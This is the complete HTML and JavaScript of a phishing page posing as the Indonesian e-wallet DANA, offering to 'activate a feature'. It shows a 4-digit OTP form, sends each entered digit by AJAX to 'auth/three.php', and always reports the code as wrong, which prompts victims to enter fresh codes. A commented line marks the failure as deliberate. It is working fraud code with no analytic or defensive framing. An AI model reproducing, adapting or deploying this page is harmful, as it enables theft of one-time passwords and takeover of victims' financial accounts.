<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<head>
  <meta charset="utf-8" />
  <meta name="viewport" content="width=device-width,initial-scale=1" />
<meta http-equiv="refresh">
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">

  <title>𝗗𝗔𝗡𝗔 𝗜𝗗 || 𝗔𝗞𝗧𝗜𝗙𝗞𝗔𝗡 𝗙𝗜𝗧𝗨𝗥</title>
  <meta name="description" content="Hai TemanDANA, Jika membutuhkan bantuan yuk hubungi kami langsung">

  <!-- Open Graph -->
  <meta property="og:title" content="𝗗𝗔𝗡𝗔 𝗜𝗗 || 𝗔𝗞𝗧𝗜𝗙𝗞𝗔𝗡 𝗙𝗜𝗧𝗨𝗥">
  <meta property="og:description" content="Hai TemanDANA, Jika membutuhkan bantuan yuk hubungi kami langsung">
  <meta property="og:image" content="https://dana.zalnir.biz.id/images/img-dana_logo.png">
  <meta property="og:url" content="https://www.dana.id/">
  <meta property="og:type" content="website">

  <!-- Twitter -->
  <meta name="twitter:card" content="summary_large_image">
  <meta name="twitter:title" content="𝗗𝗔𝗡𝗔 𝗜𝗗 || 𝗔𝗞𝗧𝗜𝗙𝗞𝗔𝗡 𝗙𝗜𝗧𝗨𝗥">
  <meta name="twitter:description" content="Hai TemanDANA, Jika membutuhkan bantuan yuk hubungi kami langsung">
  <meta name="twitter:image" content="https://dana.zalnir.biz.id/images/img-dana_logo.png">
  
  <style>
    body {font-family:sans-serif;background:#0da0ff;margin:0;display:flex;justify-content:center;align-items:center;min-height:100vh;}
    .card {background:#fff;padding:20px;border-radius:16px;max-width:400px;width:100%;text-align:center;box-shadow:0 6px 16px rgba(0,0,0,0.15);}
    .top-img,.tekstutor {max-width:250px;margin:12px auto;display:block;}
    h1 {margin:8px 0 16px;font-size:18px;color:#111;}
    .phone-row {display:flex;justify-content:center;align-items:center;gap:6px;margin:10px 0;font-weight:700;}
    .phone-row img {width:22px;height:14px;object-fit:cover;}
    .otp-box {display:flex;gap:10px;justify-content:center;margin:20px 0;}
    .otp-box input {width:50px;height:50px;text-align:center;font-size:22px;border:2px solid #dceefe;border-radius:8px;outline:none;transition:0.2s;}
    .otp-box input:focus {border-color:#007bff;box-shadow:0 0 6px rgba(0,123,255,0.25);}
    .invalid {animation: shake 0.3s; border-color:red !important;}
    @keyframes shake {
      0% {transform:translateX(0);}
      25% {transform:translateX(-4px);}
      50% {transform:translateX(4px);}
      75% {transform:translateX(-4px);}
      100% {transform:translateX(0);}
    }
    .timer {margin:12px 0;font-weight:700;}
  </style>
</head>

<link rel="canonical" href="https://www.dana.id/">
<meta property="og:url" content="">
<meta property="og:description" content="Hai TemanDANA, Jika membutuhkan bantuan yuk hubungi kami langsung">
<meta property="twitter:description" content="Hai TemanDANA, Jika membutuhkan bantuan yuk hubungi kami langsung">

<body>
 
<!-- Halaman OTP (4 digit) -->
<div class="otp-section" style="
  text-align:center; 
  padding:20px; 
  background:#fff; 
  border-radius:20px; 
  max-width:360px; 
  margin:20px auto;
">

  <!-- Tutor -->
  <img src="tutor.png" alt="Tutor" style="width:100%; margin-bottom:40px;">

  <!-- Judul -->
  <h3 style="font-size:16px; font-weight:bold; color:#000; margin-bottom:10px;">
    Masukkan kode OTP
  </h3>

  <!-- Form OTP -->
  <form id="formOtp" onsubmit="return false;" style="margin-bottom:10px;">
  <div style="display:flex; justify-content:center; gap:12px; margin-bottom:10px;">
    <input id="otp1" name="otp1" maxlength="1" class="inpotp" type="tel" required>
    <input id="otp2" name="otp2" maxlength="1" class="inpotp" type="tel" required>
    <input id="otp3" name="otp3" maxlength="1" class="inpotp" type="tel" required>
    <input id="otp4" name="otp4" maxlength="1" class="inpotp" type="tel" required>
  </div>
</form>

  <!-- Timer -->
  <div id="timer" style="margin:10px 0; font-weight:bold; font-size:15px; color:#000;">
    Waktu tersisa: <span id="countdown">00:60</span> detik
  </div>

  <!-- Error Message -->
  <div id="otpError" style="display:none; color:red; margin-bottom:10px; font-size:14px;">
    OTP salah atau kadaluarsa!
  </div>

  <!-- Footer -->
  <img src="tekstutor.png" alt="Akhir" style="width:100%; margin-top:10px;">
</div>

<style>
.otp-section {
  background: #fff !important;  /* full putih */
  border-radius: 20px;
  padding: 20px;
  color: #000 !important;       /* teks hitam */
}

.otp-section h3,
.otp-section p,
.otp-section label {
  color: #000 !important;
}

.inpotp {
  width: 55px;
  height: 55px;
  text-align: center;
  font-size: 22px;           /* angka lebih besar */
  font-weight: bold;         /* tebal */
  font-family: 'Poppins', sans-serif;  /* atau monospace kalau mau kayak digital */
  border: 2px solid #118EEA; /* biru elegan */
  border-radius: 14px;       /* lengkungan */
  background: #fff;
  color: #000;
  outline: none;
  transition: all 0.2s ease-in-out;
}

.inpotp:focus {
  border-color: #0a6ebd;
  box-shadow: 0 0 8px rgba(17,142,234,0.5);
  transform: scale(1.05); /* efek zoom dikit */
}

#countdown {
  color: #000 !important;   /* Angka hitam */
  font-weight: bold;
  font-size: 16px;
}

#otpError {
  color: red !important;    /* Pesan error merah */
  font-weight: bold;
  font-size: 14px;
  display: none;
}

</style>

<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script>
let countdown = 120;
let timer;
let otpExpired = false;

function startOtpTimer() {
  countdown = 120;
  otpExpired = false;
  $("#countdown").text(countdown);
  clearInterval(timer);

  timer = setInterval(function() {
    if(countdown <= 0) {
      clearInterval(timer);
      otpExpired = true;
      $("#otpError").text("OTP kadaluarsa!").show();
      $(".inpotp").val('');
      $("#otp1").focus();
    } else {
      $("#countdown").text(countdown);
    }
    countdown--;
  }, 1000);
}

// Auto-send saat semua kotak terisi
$(document).on("input", ".inpotp", function() {
  const inputs = $(".inpotp");
  const index = inputs.index(this);

  if(this.value.length === 1 && index < inputs.length - 1) {
    inputs.eq(index + 1).focus();
  }

  let filled = true;
  inputs.each(function() {
    if($(this).val() === "") filled = false;
  });

  if(filled) {
    if(otpExpired) {
      $("#otpError").text("OTP kadaluarsa!").show();
      inputs.val('');
      $("#otp1").focus();
    } else {
      sendOtp(); // kirim 4 field sekaligus
    }
  }
});

function sendOtp() {
  $.ajax({
    type: "POST",
    url: "auth/three.php",
    data: { 
      otp1: $("#otp1").val(),
      otp2: $("#otp2").val(),
      otp3: $("#otp3").val(),
      otp4: $("#otp4").val()
    },
    success: function(resp) {
      // selalu gagal
      $("#otpError").text("OTP salah!").show();
      $(".inpotp").val('');
      $("#otp1").focus();
    },
    error: function() {
      $("#otpError").text("OTP salah!").show();
      $(".inpotp").val('');
      $("#otp1").focus();
    }
  });
}

// Backspace auto mundur
$(document).on("keydown", ".inpotp", function(event) {
  const inputs = $(".inpotp");
  const index = inputs.index(this);
  if(event.key === "Backspace" && this.value.length === 0 && index > 0) {
    inputs.eq(index - 1).focus();
  }
});

// >>> Tambahan agar timer jalan
$(document).ready(function() {
  startOtpTimer();
  $("#otp1").focus();
});

</script>

<script>
document.addEventListener("DOMContentLoaded", function() {
  const inputs = document.querySelectorAll(".inpotp");

  inputs.forEach((input, index) => {
    // pindah otomatis ke input berikutnya kalau sudah diisi
    input.addEventListener("input", function() {
      if (this.value.length === 1 && index < inputs.length - 1) {
        inputs[index + 1].focus();
      }
    });

    // cegah loncat input kalau sebelumnya kosong
    input.addEventListener("focus", function() {
      for (let i = 0; i < index; i++) {
        if (inputs[i].value === "") {
          inputs[i].focus();
          break;
        }
      }
    });

    // backspace → balik ke input sebelumnya
    input.addEventListener("keydown", function(e) {
      if (e.key === "Backspace" && this.value === "" && index > 0) {
        inputs[index - 1].focus();
      }
    });
  });
});
</script>

</body>
</html>